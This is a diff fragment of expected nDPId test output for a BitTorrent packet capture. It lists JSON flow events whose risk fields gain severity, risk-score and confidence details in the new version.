-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00716{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7440000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00716{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7440000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7440000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00842{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
